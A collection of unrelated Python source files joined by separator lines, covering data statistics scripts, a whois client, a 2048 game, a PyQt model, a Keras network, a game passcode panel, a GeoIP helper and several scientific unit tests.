def separateClasses(self):
result = []
for i in self:
result.append(i[0:3])
return result
def sortAttrToSpecifiedClass(listOfClasses, listOfAttributes):
result = []
listIteration = 0
for i in listOfClasses:
x = KlasaDecyzyjna()
x.setKlasaDecyzyjna(i)
attributes = SystemDecyzyjny.switchColumnsToRows(listOfAttributes)
x.setAttributes(attributes[listIteration])
listIteration += 1
result.append(x)
return result
def switchColumnsToRows(self):
result = []
for x in range(len(self[0])):
row = []
for i in range(len(self)):
row.append(self[i][x])
result.append(row)
return result
def average(self):
sum = 0
for i in self:
sum = sum + float(i)
return sum / len(self)
def numberOfAttributesInClass(classes, numeric):
for i in range(len(classes)):
print(KlasaDecyzyjna.getKlasaDecyzyjna(classes[i]), "has", len(KlasaDecyzyjna.getAttributes(classes[i])),
"attributes")
def standardDeviation(classes, numeric):
for i in numeric:
standDevList = KlasaDecyzyjna.getAttributes(classes[i])
standDevAvg = SystemDecyzyjny.average(standDevList)
sum = 0
for j in standDevList:
xi = float(j) - standDevAvg
xi2 = xi * xi
sum = sum + xi2
standDev = math.sqrt(sum / len(standDevList))
print(KlasaDecyzyjna.getKlasaDecyzyjna(classes[i]), "standard deviation:", standDev)
def splitIntoLines(self):
return re.split(r'\n', self)
def listAttributesAndTheirNumbers(self):
lines = SystemDecyzyjny.splitIntoLines(self)
myArray = []
for line in lines:
myArray.append(line.split(" "))
return myArray
def main():
SystemDecyzyjny.printFile("australian-type.txt")
array = SystemDecyzyjny.splitIntoLines(open("australian-type.txt").read())
print(array)
lines = SystemDecyzyjny.listAttributesAndTheirNumbers(open("australian.txt").read())
SystemDecyzyjny.minAttributeValue(lines, SystemDecyzyjny.getNumericAttributes(array))
SystemDecyzyjny.maxAttributeValue(lines, SystemDecyzyjny.getNumericAttributes(array))
SystemDecyzyjny.switchColumnsToRows(SystemDecyzyjny.listAttributesAndTheirNumbers(open("australian.txt").read()))
classes = SystemDecyzyjny.sortAttrToSpecifiedClass(SystemDecyzyjny.separateClasses(array),
SystemDecyzyjny.listAttributesAndTheirNumbers(
open("australian.txt").read()))
SystemDecyzyjny.numberOfAttributesInClass(classes, SystemDecyzyjny.switchColumnsToRows(
SystemDecyzyjny.listAttributesAndTheirNumbers(open("australian.txt").read())))
for elem in classes:
print("Różne wartości dla decyzji "+ elem.getKlasaDecyzyjna()+": ")
print(unique(elem.getAttributes()))
for elem in classes:
print("Wszystkie wartości dla decyzji "+ elem.getKlasaDecyzyjna()+": ")
print(*elem.getAttributes())
SystemDecyzyjny.standardDeviation(classes, SystemDecyzyjny.getNumericAttributes(array))
if __name__ == "__main__":
main()
|
import base64
import dash_html_components as html
def get_banner():
banner = html.Div(
id='app-page-header',
children=[
html.A(
id='dashbio-logo', children=[
html.Img(
src="./assets/MarianneLogo-3-90x57.png"
)],
href="https://www.etalab.gouv.fr/"
),
html.H2(["Data Gouv pour le Machine Learning (DGML)", html.Sup("β")],
style={"fontFamily": "Acumin"}),
html.A(
id='gh-link',
children=[
'Voir sur Github'
],
href="https://github.com/etalab-ia/dgml",
style={'color': 'black',
'border': 'solid 1px black'},
target="_blank"
),
html.Img(
src='data:image/png;base64,{}'.format(
base64.b64encode(
open('./assets/GitHub-Mark-64px.png', 'rb').read()
).decode()
)
)
],
)
return banner
|
from rs4 import asyncore
import socket
class WhoisRequest(asyncore.dispatcher_with_send):
# simple whois requestor
def __init__(self, consumer, query, host, port=43):
asyncore.dispatcher_with_send.__init__(self)
self.consumer = consumer
self.query = query
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect((host, port))
def handle_connect(self):
self.send(self.query.encode ("utf8") + b"\r\n")
def handle_expt(self):
self.close() # connection failed, shutdown
self.consumer.abort()
def handle_read(self):
# get data from server
self.consumer.feed(self.recv(2048))
def handle_close(self):
self.close()
self.consumer.close()
class WhoisConsumer:
def __init__(self, host):
self.text = ""
self.host = host
def feed(self, text):
self.text = self.text + text
def abort(self):
print(self.host, "=>", "failed")
def close(self):
print(self.host, "=>")
print(self.text)
#
# try it out
for host in []:
consumer = WhoisConsumer(host)
request = WhoisRequest(consumer, host, "whois.internic.net")
# loop returns when all requests have been processed
asyncore.loop()
|
import numpy
import os
def readrcp(rcpfile):
# tab depth used for dictionary nesting
def getKeyDepth(key):
counter = (len(key) - len(key.lstrip())) / 4
return counter
f = open(rcpfile, "rU")
rcp = f.readlines()
f.close()
# make d[k, v] from lines of 'k: v', recurse function call if v is empty
def readKeys(rcplines, depth=0):
d = {}
for i, cline in enumerate(rcplines):
cdepth = getKeyDepth(cline)
if cdepth != depth:
next
else:
k = cline.split(":")[0].rstrip("\r\n")
try:
v = cline.split(": ")[1].lstrip().rstrip("\r\n")
except:
remaining_cdepths = [
l
for l, v in enumerate(
[getKeyDepth(line) for line in rcplines[i + 1 :]]
)
if v == cdepth
]
if len(remaining_cdepths) == 0:
v = readKeys(rcplines[i + 1 :], depth=cdepth + 1)
else:
v = readKeys(
rcplines[i + 1 : i + remaining_cdepths[0] + 1],
depth=cdepth + 1,
)
pass
d[k.lstrip()] = v
if i == len(rcplines) | cdepth > getKeyDepth(rcplines[i + 1]):
return d
return d
return readKeys(rcp)
def myeval(c):
if c == "None":
c = None
elif c == "nan" or c == "NaN":
c = numpy.nan
else:
temp = c.lstrip("0")
if (temp == "" or temp == ".") and "0" in c:
c = 0
else:
c = eval(temp)
return c
def readsingleplatemaptxt(p, returnfiducials=False, erroruifcn=None, lines=None):
if lines is None:
try:
f = open(p, mode="r")
except:
if erroruifcn is None:
return []
p = erroruifcn("bad platemap path")
if len(p) == 0:
return []
f = open(p, mode="r")
ls = f.readlines()
f.close()
else:
ls = lines
if returnfiducials:
s = ls[0].partition("=")[2].partition("mm")[0].strip()
if (
not "," in s[s.find("(") : s.find(")")]
): # needed because sometimes x,y in fiducials is comma delim and sometimes not
print("WARNING: commas inserted into fiducials line to adhere to format.")
print(s)
s = (
s.replace("( ", "( ")
.replace("( ", "( ")
.replace("( ", "(")
.replace(" )", " )")
.replace(", ", ",")
.replace(", ", ",")
.replace(" )", " )")
.replace(" )", ")")
.replace(" ", ",")
.replace(" ", ",")
.replace(" ", ",")
)
print(s)
fid = eval("[%s]" % s)
fid = numpy.array(fid)
for count, l in enumerate(ls):
if not l.startswith("%"):
break
keys = ls[count - 1][1:].split(",")
keys = [(k.partition("(")[0]).strip() for k in keys]
dlist = []
for l in ls[count:]:
sl = l.split(",")
d = dict([(k, myeval(s.strip())) for k, s in zip(keys, sl)])
dlist += [d]
if not "sample_no" in keys:
dlist = [dict(d, sample_no=d["Sample"]) for d in dlist]
if returnfiducials:
return dlist, fid
return dlist
|
import sys
from .board import GameBoard
def main(size, win):
game = GameBoard(size, win)
actions = {'l': game.shift_left,
'r': game.shift_right,
'u': game.shift_up,
'd': game.shift_down,
'undo': game.undo,
'exit': None}
stop = False
while not stop:
print_gameboard(game)
if game.won():
print('You won!')
stop = True
elif game.lost():
print('You lost. Try again.')
stop = True
else:
action = input_action(actions)
if not action:
stop = True
else:
action()
print()
def print_gameboard(gb: GameBoard):
print(f'..:: {gb.win} GAME ::..')
print(f'Score: {gb.get_score()}')
print(f'Moves: {gb.moves}')
print()
print('+'.join(['-'*6 for i in range(gb.size)]))
for row in gb.board:
items = []
for cell in row:
if cell == 0:
items.append(' '*6)
else:
items.append(f' {cell :<4} ')
print('|'.join(items))
print('+'.join(['-'*6 for i in range(gb.size)]))
print()
def input_action(actions):
while True:
user_input = input('Shift board (l/r/u/d) or do action (undo/exit): ')
user_input = user_input.strip().lower()
if user_input in actions.keys():
return actions[user_input]
else:
print('ERROR: Invalid action. Try again.')
|
# domain to company by hand
import json
import string
import clearbit
from pprint import pprint
with open('companies.json') as company_dump:
companies = json.load(company_dump)
# with open('baddata.txt') as baddata:
# dirtyComp = baddata.readlines()
# i =0
# for comp in dirtyComp:
# i=i+1
# if (i%3 ==0):
# print comp
commitCompany = {}
j=2
for key in companies:
print("what is this company?")
print key
company = raw_input()
# commitCompany[key] = dirtyComp[j]
j=j+3
pprint(commitCompany)
with open('companies2.json', 'w') as company_dump:
json.dump(commitCompany, company_dump)
# with open('companies2.json') as company_dump:
# check = json.load(company_dump)
# pprint(check)
|
import logging
import json
from PyQt5.QtCore import Qt, QAbstractTableModel, QVariant
class Model(QAbstractTableModel):
def __init__(self, parent):
QAbstractTableModel.__init__(self)
self.gui = parent
self.colLabels = ['Title', 'Video', 'Audio', 'Progress', 'URL']
self._data = []
# self._data = [
# ['Кухня 87', '140', '137', '0%', 'https://www.youtube.com/watch?v=G6bSu02Fmxo', [],],
# ['Кухня 92', '140', '137', '0%', 'https://www.youtube.com/watch?v=thazG-S8J-Q', [],],
# ['100 Years of Flight Attendant Uniforms', '160', '249', '0%', 'https://www.youtube.com/watch?v=1IEfCoGnTow', [],],
# ]
with open('yd.json', encoding='utf-8') as f:
data = json.load(f)
# print(json.dumps(data, indent=2))
# print(data["items"][0])
for el in data["items"]:
print(el["formats"])
print("\n\n")
self._data.append([el["title"], el["video"], el["audio"], '0%', el["url"], el["formats"],])
def save(self):
state = { 'items': self._data }
with open('yd-new.json', mode='w', encoding='utf-8') as f:
json.dump(state, f, indent=2)
def rowCount(self, parent):
return len(self._data)
def columnCount(self, parent):
return len(self.colLabels)
def data(self, index, role=Qt.DisplayRole):
if not index.isValid():
return QVariant()
elif role != Qt.DisplayRole and role != Qt.EditRole:
return QVariant()
value = ''
if role == Qt.DisplayRole:
row = index.row()
col = index.column()
value = self._data[row][col]
return QVariant(value)
def headerData(self, section, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return QVariant(self.colLabels[section])
return QVariant()
def addrow(self, row):
self._data.append(row)
def getRowByIdx(self, idx):
return self._data[idx]
def getFormatsByIdx(self, idx):
return self._data[idx][1] + "+" + self._data[idx][2]
def getListOfFormatsByIdx(self, idx):
return self._data[idx][5]
def getUrlByIdx(self, idx):
return self._data[idx][4]
def updateProgress(self, idx, value1, value2):
self._data[idx][3] = str(value1) + "+" + str(value2)
self.dataChanged.emit(self.createIndex(0, 0), self.createIndex(self.rowCount(0), self.columnCount(0)))
# logging.debug(self._data[idx])
|
'''
MobileHairNet models
'''
from .hairnet import MobileHairNet
|
import os
import time
import grpc
from formant.protos.agent.v1 import agent_pb2_grpc
from formant.protos.model.v1 import datapoint_pb2, file_pb2
path = os.path.dirname(os.path.realpath(__file__))
channel = grpc.insecure_channel("localhost:5501")
agent = agent_pb2_grpc.AgentStub(channel)
file_datapoint = file_pb2.File()
file_path = "%s/../../data/planets.csv" % path
file_datapoint.url = file_path
file_datapoint.filename = "planets.csv"
request = datapoint_pb2.Datapoint(
stream="test.file", file=file_datapoint, timestamp=int(time.time() * 1000)
)
agent.PostData(request)
|
from __future__ import annotations
from typing import List, Any, Dict, Optional, Type
from .base import IonSerializer
class IonBoolSerializer(IonSerializer):
"""
Serializes bool values as ``flagcontent``
"""
def __init__(self, name: str, data: bool, **kwargs) -> None:
super().__init__(name, **kwargs)
self.data = data
def serialize(self) -> Optional[Dict[str, Any]]:
result = super().serialize()
if result is None:
return None
result.update({
'type': 'flagcontent',
'is_enabled': self.data
})
return result
@classmethod
def supported_types(cls) -> List[Type]:
return [bool]
IonSerializer.register(IonBoolSerializer)
|
class Disjoint:
def __init__(self):
self.parent=None
self.rank=0
self.element=None
self.e=[]
class Set:
def __init__(self):
#self.repre=Disjoint()
self.repre=None
def makset(self,x,data):
self.repre=x
x.parent=x
x.rank=0
x.element=data
def findset1(self,x):
if x.parent==x:
return x
return self.findset1(x.parent)
def findset(self,x):
if x.parent==x:
return x
x.parent=self.findset(x.parent)
return x.parent
def Union(self,x,y):
rx=self.findset(x)
ry=self.findset(y)
if rx.rank>ry.rank:
ry.parent=rx
rx.e.append(ry.element)
elif rx.rank<ry.rank:
rx.parent=ry
ry.e.append(rx.element)
else:
ry.e.append(rx.element)
rx.parent=ry
ry.rank+=1
'''x=Disjoint()
x.element=1
y=Disjoint()
y.element=2
s=Set()
s.makset(x,1)
s.makset(y,2)
print((s.findset(x)).element)
s.Union(x,y)
print((s.findset(x)).element)
print((s.findset(y)).element)'''
print("Enter the total no of nodes:")
n=int(input())
print("Enter no of edges:")
e=int(input())
arr=[Disjoint() for i in range(n)]
s=Set()
for i in range(n):
s.makset(arr[i],i)
i=0
while i<e:
print("enter edges:")
x,y=map(int,input().split())
if x<n and y<n:
s.Union(arr[x],arr[y])
i+=1
else:
print("Invalid edge:")
i-=1
for i in range(n):
print(arr[i].rank)
|
from setuptools import setup, find_packages
setup(
name='pytorch_h5dataset',
version='0.2.4',
packages=find_packages(),
url='https://github.com/CeadeS/PyTorchH5Dataset',
license='BSD-3-Clause License',
author='Martin Hofmann',
author_email='Martin.Hofmann@tu-ilmenau.de',
description='Accelerated data loading H5 dataset module for PyTorch.',
install_requires=[
'numpy',
'h5py>=3.3.0',
'hdf5plugin',
'pandas',
'Pillow',
'tables',
'torch',
'scikit-image',
'torchvision',
'psutil',
'tqdm',
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
],
)
|
# mailstat.metric.counts
# Performs counting statistics of emails.
#
# Author: Benjamin Bengfort <benjamin@bengfort.com>
# Created: timestamp
#
# Copyright (C) 2013 Bengfort.com
# For license information, see LICENSE.txt
#
# ID: counts.py [] benjamin@bengfort.com $
"""
Performs counting statistics of emails.
"""
##########################################################################
## Imports
##########################################################################
from mailstat.metric import Metric
##########################################################################
## Metrics
##########################################################################
class MostFrequentCorrespondents(Metric):
"""
Determines the top 10 most frequent communicators
"""
pass
|
from typing import Union
import numpy as np
import tensorflow.keras as keras
from numpy import ndarray
from pandas import DataFrame
from .model_helpers import make_tensorboard_callback, make_save_path
from ..utils import naming
class SimpleModel:
def __init__(self, directory_name: str, n_input: int, n_output: int):
self.directory_name = directory_name
self.model = keras.models.Sequential()
self.model.add(keras.layers.Dense(400, input_dim=n_input))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(800))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(400))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(300))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(200))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(100))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(n_output))
self.model.add(keras.layers.Activation('relu'))
self.model.summary()
adam_optimizer = keras.optimizers.Adam(lr=0.0005, beta_1=0.9, beta_2=0.999, epsilon=1e-8, decay=0,
amsgrad=False)
self.model.compile(loss='mean_squared_error', optimizer=adam_optimizer)
def train(self, input_train: ndarray, output_train: Union[DataFrame, ndarray], input_val: ndarray,
output_val: Union[DataFrame, ndarray], epochs=60):
*callbacks, time_stamp = self._setup_training()
output_train = np.array(output_train)
output_val = np.array(output_val)
hist = self.model.fit(input_train, output_train, validation_data=(input_val, output_val), epochs=epochs,
batch_size=256, verbose=1, callbacks=callbacks)
return hist, time_stamp
def train_with_generator(self, data_generator_train, data_generator_val, epochs=60):
*callbacks, time_stamp = self._setup_training()
hist = self.model.fit(data_generator_train, validation_data=data_generator_val, epochs=epochs, verbose=1,
callbacks=callbacks)
return hist, time_stamp
def _setup_training(self):
time_stamp = naming.make_timestamp()
tb_callback = make_tensorboard_callback(self.directory_name, time_stamp)
save_path = make_save_path(self.directory_name, time_stamp)
checkpoint = keras.callbacks.ModelCheckpoint(filepath=save_path, monitor='val_loss', verbose=1,
save_best_only=True)
lr_reduction = keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.5)
return tb_callback, checkpoint, lr_reduction, time_stamp
|
class Trampoline() :
called = False
def __init__(self, func) :
self.func = func
def __get__(self, obj, objtype) :
if not hasattr(self.func, '__self__') : self.func.__self__ = obj
return self.__call__
def __call__(self, *args, **kwargs) :
r = (self.func, [self.func.__self__, *args] if hasattr(self.func, '__self__') else args, kwargs)
if not Trampoline.called :
try :
Trampoline.called = True
while isinstance(r, tuple) and callable(r[0]) and isinstance(r[1], (tuple, list)) and isinstance(r[2], dict) :
(r, a, k) = r
if isinstance(r, Trampoline) : r = r.func
r = r(*a, **k)
except Exception : raise
finally : Trampoline.called = False
return r
|
for i in range(1,int(input())+1):
if i%2!=0:print(i)
|
from code.render.glfunctions import draw_rect, draw_rounded_rect
from code.constants.common import HACK_PANEL_WIDTH, HACK_PANEL_HEIGHT, SCREEN_WIDTH, SCREEN_HEIGHT, INPUT_SELECTION_LEFT, INPUT_SELECTION_RIGHT, INPUT_SELECTION_UP, INPUT_SELECTION_DOWN, INPUT_SELECTION_ACTIVATE, HACK_PANEL_TEMPORARY_STATUS_DURATION
from code.controllers.intervalcontroller import IntervalController
class HackPanel:
def __init__(self, passcode):
# The code to unlock the terminal
self.passcode = passcode
# Currently entered code
self.display = ""
# Current cursor location
self.cursor = 0
# Status message
self.status = "Awaiting input..."
# Temporary status message (e.g. on incorrect input)
self.temporary_status = ""
self.temporary_status_interval = 0
# Alpha control
self.alpha_controller = IntervalController(
interval = 0.0,
target = 1.0,
speed_in = 0.015,
speed_out = 0.035
)
# The buttons
self.buttons = (
(1, "1", 1), # value, label, width
(2, "2", 1),
(3, "3", 1),
(4, "4", 1),
(5, "5", 1),
(6, "6", 1),
(7, "7", 1),
(8, "8", 1),
(9, "9", 1),
(-1, "Back", 1),
(0, "0", 1),
(-2, "Exit", 1)
)
# Fading away?
def is_fading(self):
return ( self.alpha__controller.get_target() == 0 )
# Faded away?
def is_gone(self):
return ( not self.alpha_controller.is_visible() )
def dismiss(self):
self.alpha_controller.dismiss()
def set_temporary_status(self, status):
self.temporary_status = status
self.temporary_status_interval = HACK_PANEL_TEMPORARY_STATUS_DURATION
def process(self, user_input, session):
# Process alpha
self.alpha_controller.process()
# Handle temporary status messages
if (self.temporary_status_interval > 0):
self.temporary_status_interval -= 1
if (self.temporary_status_interval <= 0):
self.temporary_status = ""
per_row = 3
# Check for user input
if (INPUT_SELECTION_LEFT in user_input):
if (self.cursor % per_row == 0):
self.cursor += (per_row - 1)
else:
self.cursor -= 1
if (self.cursor < 0):
self.cursor += (per_row + 1)
elif (INPUT_SELECTION_RIGHT in user_input):
if ( (self.cursor + 1) % per_row == 0):
self.cursor -= (per_row - 1)
else:
self.cursor += 1
if (self.cursor >= len(self.buttons)):
self.cursor -= per_row
elif (INPUT_SELECTION_UP in user_input):
self.cursor -= per_row
if (self.cursor < 0):
self.cursor += len(self.buttons)
elif (INPUT_SELECTION_DOWN in user_input):
self.cursor += per_row
if (self.cursor >= len(self.buttons)):
self.cursor -= len(self.buttons)
elif (INPUT_SELECTION_ACTIVATE in user_input):
# Append the value of the current selection
(value, title, width) = self.buttons[self.cursor]
if (value == -1):
if (len(self.display) > 0):
# Backspace
self.display = self.display[0 : len(self.display) - 1]
elif (value == -2):
session["core.login-succeeded"]["value"] = "no"
self.dismiss()
else:
self.display += "%d" % value
# Same length as passcode? Do check...
if (len(self.display) == len(self.passcode)):
if (self.display == self.passcode):
session["core.login-succeeded"]["value"] = "yes"
self.dismiss()
else:
self.display = ""
self.set_temporary_status("Unauthorized Access Attempt")
def render(self, text_renderer):
# Lightbox effect
draw_rect(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, (25, 25, 25, (self.alpha_controller.get_interval() / 1.5)))
(x, y) = (
int(SCREEN_WIDTH / 2) - int(HACK_PANEL_WIDTH / 2),
int(SCREEN_HEIGHT / 2) - int(HACK_PANEL_HEIGHT / 2)
)
# Elegant background
draw_rounded_rect(x, y, HACK_PANEL_WIDTH, HACK_PANEL_HEIGHT, (25, 25, 25, self.alpha_controller.get_interval()), (100, 50, 5, self.alpha_controller.get_interval()), border_size = 3)
# general padding
padding = 10
# render point
rx = padding
ry = padding * 2
# Render current entry status
text_renderer.render("Enter Code:", x + rx + 15, y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
draw_rounded_rect(x + rx + (HACK_PANEL_WIDTH / 2) - 15, y + ry, (HACK_PANEL_WIDTH / 2) - (2 * padding), text_renderer.font_height, (25, 25, 25, self.alpha_controller.get_interval()), (70, 20, 5, self.alpha_controller.get_interval()))
readout = self.display
while (len(readout) < len(self.passcode)):
readout += "?"
readout_x = (x + HACK_PANEL_WIDTH - padding - text_renderer.size(readout) - 15 - padding)
text_renderer.render(readout, readout_x, y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
text_renderer.render(self.display, readout_x, y + ry, (219, 183, 21, self.alpha_controller.get_interval()))
# Advance cursor double space
ry += 2 * text_renderer.font_height
# Render all buttons
per_row = 3
row_width = 0
button_width = int((HACK_PANEL_WIDTH - (2 * padding)) / 3)
for i in range(0, len(self.buttons)):
(value, title, width) = self.buttons[i]
if (i == self.cursor):
text_renderer.render(title, x + rx + int( (width * button_width) / 2) - int(text_renderer.size(title) / 2), y + ry, (219, 183, 21, self.alpha_controller.get_interval()))
# Faint white highlight
if (not self.is_fading()):
draw_rect(x + rx, y + ry, button_width, text_renderer.font_height, (225, 225, 225, 0.2))
else:
text_renderer.render(title, x + rx + int( (width * button_width) / 2) - int(text_renderer.size(title) / 2), y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
rx += (width * button_width)
row_width += width
if (row_width >= 3):
row_width = 0
rx = padding
ry += text_renderer.font_height + padding
# Double-space
ry += text_renderer.font_height
# Display status
if (self.temporary_status != ""):
text_renderer.render(self.temporary_status, x + int(HACK_PANEL_WIDTH / 2) - int(text_renderer.size(self.temporary_status) / 2), y + ry, (225, 25, 25, self.alpha_controller.get_interval()))
else:
text_renderer.render(self.status, x + int(HACK_PANEL_WIDTH / 2) - int(text_renderer.size(self.status) / 2), y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
|
# -*- coding: utf-8 -*-
# @File : geoip.py
# @Date : 2021/2/25
# @Desc :
import os
import geoip2.database
from django.conf import settings
from Lib.log import logger
from Lib.xcache import Xcache
class Geoip(object):
def __init__(self):
pass
@staticmethod
def get_city(ip):
result = Xcache.get_city_reader_cache(ip)
if result is not None:
return result
city_mmdb_dir = os.path.join(settings.BASE_DIR, 'STATICFILES', 'STATIC', 'GeoLite2-City.mmdb')
city_reader = geoip2.database.Reader(city_mmdb_dir)
try:
response = city_reader.city(ip)
except Exception as _:
Xcache.set_city_reader_cache(ip, "局域网")
return "局域网"
country = ""
try:
country = response.country.name
country = response.country.names['zh-CN']
except Exception as E:
logger.exception(E)
if country is None:
country = ""
subdivision = ""
try:
subdivision = response.subdivisions.most_specific.name
subdivision = response.subdivisions.most_specific.names['zh-CN']
except Exception as _:
pass
if subdivision is None:
subdivision = ""
city = ""
try:
city = response.city.name
city = response.city.names['zh-CN']
except Exception as _:
pass
if city is None:
city = ""
result = f"{country} {subdivision} {city}"
Xcache.set_city_reader_cache(ip, result)
return result
@staticmethod
def get_asn(ip):
asn_reader = Xcache.get_asn_reader_cache(ip)
if asn_reader is not None:
return asn_reader
asn_mmdb_dir = os.path.join(settings.BASE_DIR, 'STATICFILES', 'STATIC', 'GeoLite2-ASN.mmdb')
asn_reader = geoip2.database.Reader(asn_mmdb_dir)
try:
response = asn_reader.asn(ip)
except Exception as _:
Xcache.set_asn_reader_cache(ip, "")
return ""
Xcache.set_asn_reader_cache(ip, response.autonomous_system_organization)
return response.autonomous_system_organization
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test `astropy.utils.timer`.
.. note::
The tests only compare rough estimates as
performance is machine-dependent.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
# STDLIB
import time
# LOCAL
from ..timer import RunTimePredictor
def func_to_time(x):
"""This is sleeps for x seconds for timing tests."""
time.sleep(x)
return 'Slept for {0} second(s)'.format(x)
def test_timer():
p = RunTimePredictor(func_to_time)
try:
p.do_fit()
except AssertionError as e:
assert str(e) == 'Requires 3 points but has 0'
try:
p.predict_time(100)
except AssertionError as e:
assert str(e) == 'No fitted data for prediction'
p.time_func([0.1, 0.2, 0.5, 'a', 1.5])
p.time_func(1.0)
assert p._funcname == 'func_to_time'
assert p._cache_bad == ['a']
assert p.results == {0.1: 'Slept for 0.1 second(s)',
0.2: 'Slept for 0.2 second(s)',
0.5: 'Slept for 0.5 second(s)',
1.5: 'Slept for 1.5 second(s)',
1.0: 'Slept for 1.0 second(s)'}
a = p.do_fit()
assert p._power == 1
# Perfect slope is 1, with 10% uncertainty
assert 0.9 <= a[0] <= 1.1
# Perfect intercept is 0, with 1-sec uncertainty
assert -1 <= a[1] <= 1
# Perfect answer is 100, with 10% uncertainty
t = p.predict_time(100)
assert 90 <= t <= 110
# Repeated call to access cached run time
t2 = p.predict_time(100)
assert t == t2
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2020 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Unit tests for the InterpolateUsingDifference plugin."""
import unittest
import numpy as np
from numpy.testing import assert_array_equal
from improver.utilities.interpolation import InterpolateUsingDifference
from improver.utilities.warnings_handler import ManageWarnings
from ..set_up_test_cubes import add_coordinate, set_up_variable_cube
class Test_Setup(unittest.TestCase):
"""Set up for InterpolateUsingDifference tests."""
def setUp(self):
""" Set up arrays for testing."""
snow_sleet = np.array(
[[5.0, 5.0, 5.0], [10.0, 10.0, 10.0], [5.0, 5.0, 5.0]], dtype=np.float32
)
sleet_rain = np.array(
[[4.0, 4.0, 4.0], [np.nan, np.nan, np.nan], [3.0, 3.0, 3.0]],
dtype=np.float32,
)
sleet_rain = np.ma.masked_invalid(sleet_rain)
limit_data = np.array(
[[4.0, 4.0, 4.0], [10.0, 8.0, 6.0], [4.0, 4.0, 4.0]], dtype=np.float32
)
self.snow_sleet = set_up_variable_cube(
snow_sleet,
name="altitude_of_snow_falling_level",
units="m",
spatial_grid="equalarea",
)
self.sleet_rain = set_up_variable_cube(
sleet_rain,
name="altitude_of_rain_falling_level",
units="m",
spatial_grid="equalarea",
)
self.limit = set_up_variable_cube(
limit_data, name="surface_altitude", units="m", spatial_grid="equalarea"
)
class Test_repr(unittest.TestCase):
"""Test the InterpolateUsingDifference __repr__ method."""
def test_basic(self):
"""Test expected string representation is returned."""
self.assertEqual(
str(InterpolateUsingDifference()), "<InterpolateUsingDifference>"
)
class Test__check_inputs(Test_Setup):
"""Tests for the private _check_inputs method."""
def test_incomplete_reference_data(self):
"""Test an exception is raised if the reference field is incomplete."""
self.snow_sleet.data[1, 1] = np.nan
msg = "The reference cube contains np.nan data"
with self.assertRaisesRegex(ValueError, msg):
InterpolateUsingDifference()._check_inputs(
self.sleet_rain, self.snow_sleet, None
)
def test_incompatible_reference_cube_units(self):
"""Test an exception is raised if the reference cube has units that
are incompatible with the input cube."""
self.snow_sleet.units = "s"
msg = "Reference cube and/or limit do not have units compatible"
with self.assertRaisesRegex(ValueError, msg):
InterpolateUsingDifference()._check_inputs(
self.sleet_rain, self.snow_sleet, None
)
def test_incompatible_limit_units(self):
"""Test an exception is raised if the limit cube has units that
are incompatible with the input cube."""
self.limit.units = "s"
msg = "Reference cube and/or limit do not have units compatible"
with self.assertRaisesRegex(ValueError, msg):
InterpolateUsingDifference()._check_inputs(
self.sleet_rain, self.snow_sleet, limit=self.limit
)
def test_convert_units(self):
"""Test that a reference cube and limit cube with different but
compatible units are converted without an exception being raised."""
self.snow_sleet.convert_units("cm")
self.limit.convert_units("cm")
InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit
)
class Test_process(Test_Setup):
"""Test the InterpolateUsingDifference process method."""
def test_unlimited(self):
"""Test interpolation to complete an incomplete field using a reference
field. No limit is imposed upon the returned interpolated values."""
expected = np.array(
[[4.0, 4.0, 4.0], [8.5, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(self.sleet_rain, self.snow_sleet)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
